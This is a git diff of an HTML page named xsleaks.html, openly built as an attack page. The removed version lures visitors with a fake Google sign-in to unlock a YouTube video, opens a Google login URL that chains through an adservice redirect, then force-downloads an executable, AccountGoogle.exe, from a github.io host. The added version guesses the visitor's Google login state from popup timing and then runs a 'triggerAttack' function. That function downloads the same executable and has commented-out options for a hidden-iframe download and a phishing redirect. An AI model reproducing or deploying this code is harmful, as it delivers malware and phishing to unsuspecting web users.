--- a/xsleaks.html
+++ b/xsleaks.html
@@ -1,177 +1,91 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-  <meta charset="UTF-8" />
-  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
-  <title>Google Login Popup + XS-Leaks Detection</title>
+  <meta charset="UTF-8">
+  <title>XS-Leaks Login Detector</title>
   <style>
     body {
       font-family: Arial, sans-serif;
       text-align: center;
-      padding: 50px;
-      background-color: #f9f9f9;
+      margin-top: 50px;
+      background-color: #f5f5f5;
     }
-    #video-container {
-      position: relative;
-      display: block;
-      margin-top: 30px;
-      width: 560px;
-      height: 315px;
-      margin-left: auto;
-      margin-right: auto;
-      box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
-    }
-    iframe {
-      width: 100%;
-      height: 100%;
-      border: 0;
-    }
-    #overlay-lock {
-      position: absolute;
-      top: 0;
-      left: 0;
-      width: 100%;
-      height: 100%;
-      background: rgba(0, 0, 0, 0.6);
-      color: #fff;
-      display: flex;
-      justify-content: center;
-      align-items: center;
+    #status {
       font-size: 18px;
-      z-index: 10;
-      cursor: not-allowed;
-      transition: opacity 0.3s ease;
-    }
-    #login-button {
-      padding: 12px 24px;
-      font-size: 16px;
-      color: #444;
-      background-color: #fff;
-      border: 1px solid #ccc;
-      border-radius: 5px;
-      cursor: pointer;
-      display: inline-flex;
-      align-items: center;
-      gap: 10px;
-      box-shadow: 0 2px 4px rgba(0, 0, 0, 0.2);
-      transition: background-color 0.2s ease, box-shadow 0.2s ease;
-    }
-    #login-button:hover {
-      background-color: #f1f1f1;
-      box-shadow: 0 4px 8px rgba(0, 0, 0, 0.3);
-    }
-    #login-button img {
-      width: 20px;
-      height: 20px;
-    }
-    #confirm-login {
+      color: #333;
       margin-top: 20px;
-      display: none;
-    }
-    #confirm-login button {
-      padding: 10px 20px;
-      font-size: 14px;
-      border: none;
-      border-radius: 5px;
-      background-color: #34a853;
-      color: white;
-      cursor: pointer;
-    }
-    #confirm-login button:hover {
-      background-color: #2c8b46;
     }
   </style>
 </head>
 <body>
 
-  <h1>Please Sign In to Watch the Video</h1>
+<h1>Checking Google Login Status...</h1>
+<div id="status">Detecting...</div>
 
-  <button id="login-button">
-    <img src="https://www.gstatic.com/firebasejs/ui/2.0.0/images/auth/google.svg" alt="Google Logo" />
-    Sign in with Google
-  </button>
+<script>
+  const statusDiv = document.getElementById('status');
 
-  <div id="confirm-login">
-    <p>Did you finish logging in?</p>
-    <button id="confirm-button">Yes, I did!</button>
-  </div>
+  // Step 1: Open Google Login in Popup (XS-Leaks trigger)
+  function checkGoogleLogin() {
+    const popupURL = 'https://accounts.google.com/AccountChooser?continue=https://adservice.google.com/';
+    const popupWidth = 500;
+    const popupHeight = 600;
+    const left = (screen.width / 2) - (popupWidth / 2);
+    const top = (screen.height / 2) - (popupHeight / 2);
 
-  <div id="video-container">
-    <iframe
-      src="https://www.youtube.com/embed/1r7RlKRHu40"
-      title="YouTube video player"
-      allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture"
-      allowfullscreen>
-    </iframe>
+    let loginPopup = window.open(
+      popupURL,
+      'GoogleLoginPopup',
+      `width=${popupWidth},height=${popupHeight},top=${top},left=${left}`
+    );
 
-    <!-- Overlay lock -->
-    <div id="overlay-lock">Please sign in to play the youtube video</div>
-  </div>
-
-  <script>
-    const loginButton = document.getElementById('login-button');
-    const overlayLock = document.getElementById('overlay-lock');
-    const confirmSection = document.getElementById('confirm-login');
-    const confirmButton = document.getElementById('confirm-button');
-
-    // XS-Leaks Login Detection - Ping Google
-    function checkGoogleLogin(callback) {
-      const img = new Image();
-      img.src = "https://accounts.google.com/AccountChooser?continue=https://example.com&hl=en";
-      img.onload = () => callback(true);  // Logged in (image loads)
-      img.onerror = () => callback(false); // Not logged in
-    }
-
-    // 1. Cek siapa yang login Google (via XS-Leaks)
-    console.log("Checking Google login status...");
-    checkGoogleLogin((loggedIn) => {
-      if (loggedIn) {
-        console.log("✅ Google account detected. Ready to trigger attack!");
-      } else {
-        console.log("❌ User not logged in to Google. No action taken.");
-      }
-    });
-
-    // 2. Buat login popup trigger + download
-    loginButton.addEventListener('click', () => {
-      const googleLoginURL = 'https://accounts.google.com/AccountChooser/signinchooser?continue=https%3A%2F%2Fadservice.google.com%2Fddm%2Fclk%2F408533097%3B208818505%3Bl%3B%3B%3F%2F%2Flanaya113505.github.io%2Fpizza%2Fpizza.html%3F%2Fhome&ddm=1&flowEntry=AccountChooser&flowName=GlifWebSignIn&hl=id&ltmpl=youtube&service=youtube&authuser=0';
-
-      const popupWidth = 500;
-      const popupHeight = 600;
-      const left = (screen.width / 2) - (popupWidth / 2);
-      const top = (screen.height / 2) - (popupHeight / 2);
-
-      // Open the popup window
-      const loginWindow = window.open(
-        googleLoginURL,
-        'Google Login',
-        `width=${popupWidth},height=${popupHeight},top=${top},left=${left}`
-      );
-
-      // Check when the popup is closed
-      const checkPopupClosed = setInterval(() => {
-        if (loginWindow && loginWindow.closed) {
-          clearInterval(checkPopupClosed);
-          confirmSection.style.display = 'block';
+    // Step 2: Use timing-based detection for login status (XS-Leak core)
+    setTimeout(() => {
+      try {
+        // If popup already closed fast → likely logged in (redirected fast)
+        if (loginPopup.closed) {
+          statusDiv.innerText = '✅ Google Account Detected!';
+          triggerAttack();
+        } else {
+          // If popup stuck open → not logged in or blocking
+          statusDiv.innerText = '❌ No Google Login Detected!';
+          loginPopup.close();
         }
-      }, 1000);
-    });
+      } catch (err) {
+        // Cross-origin access error, might be redirect triggered → assume logged in
+        statusDiv.innerText = '✅ Google Account Detected!';
+        triggerAttack();
+      }
+    }, 1500); // Timing matters! Experiment with this delay (500-1500ms)
+  }
 
-    // 3. User confirm, trigger overlay unlock + (optional) trigger download lagi
-    confirmButton.addEventListener('click', () => {
-      overlayLock.style.display = 'none';
-      loginButton.style.display = 'none';
-      confirmSection.style.display = 'none';
+  // Step 3: Trigger the malicious action (Download EXE, redirect, etc)
+  function triggerAttack() {
+    statusDiv.innerText += '\nLaunching payload...';
 
-      // Auto download confirm fallback (optional)
-      const downloadLink = document.createElement('a');
-      downloadLink.href = 'https://lanaya113505.github.io/pizza/AccountGoogle.exe';
-      downloadLink.download = '';
-      document.body.appendChild(downloadLink);
-      downloadLink.click();
-      document.body.removeChild(downloadLink);
-    });
-  </script>
+    // Option 1: Force download an executable
+    const a = document.createElement('a');
+    a.href = 'https://lanaya113505.github.io/pizza/AccountGoogle.exe';
+    a.download = 'AccountGoogle.exe'; // This triggers "Save As" in most browsers
+    document.body.appendChild(a);
+    a.click();
+    a.remove();
+
+    // Option 2: Hidden iframe for silent redirect or requests
+    /*
+    const iframe = document.createElement('iframe');
+    iframe.style.display = 'none';
+    iframe.src = 'https://lanaya113505.github.io/pizza/AccountGoogle.exe';
+    document.body.appendChild(iframe);
+    */
+
+    // Option 3: Redirect user (phishing or auto exploit)
+    // window.location.href = 'https://lanaya113505.github.io/phishing.html';
+  }
+
+  // Start XS-Leak detection immediately
+  checkGoogleLogin();
+</script>
 
 </body>
 </html>
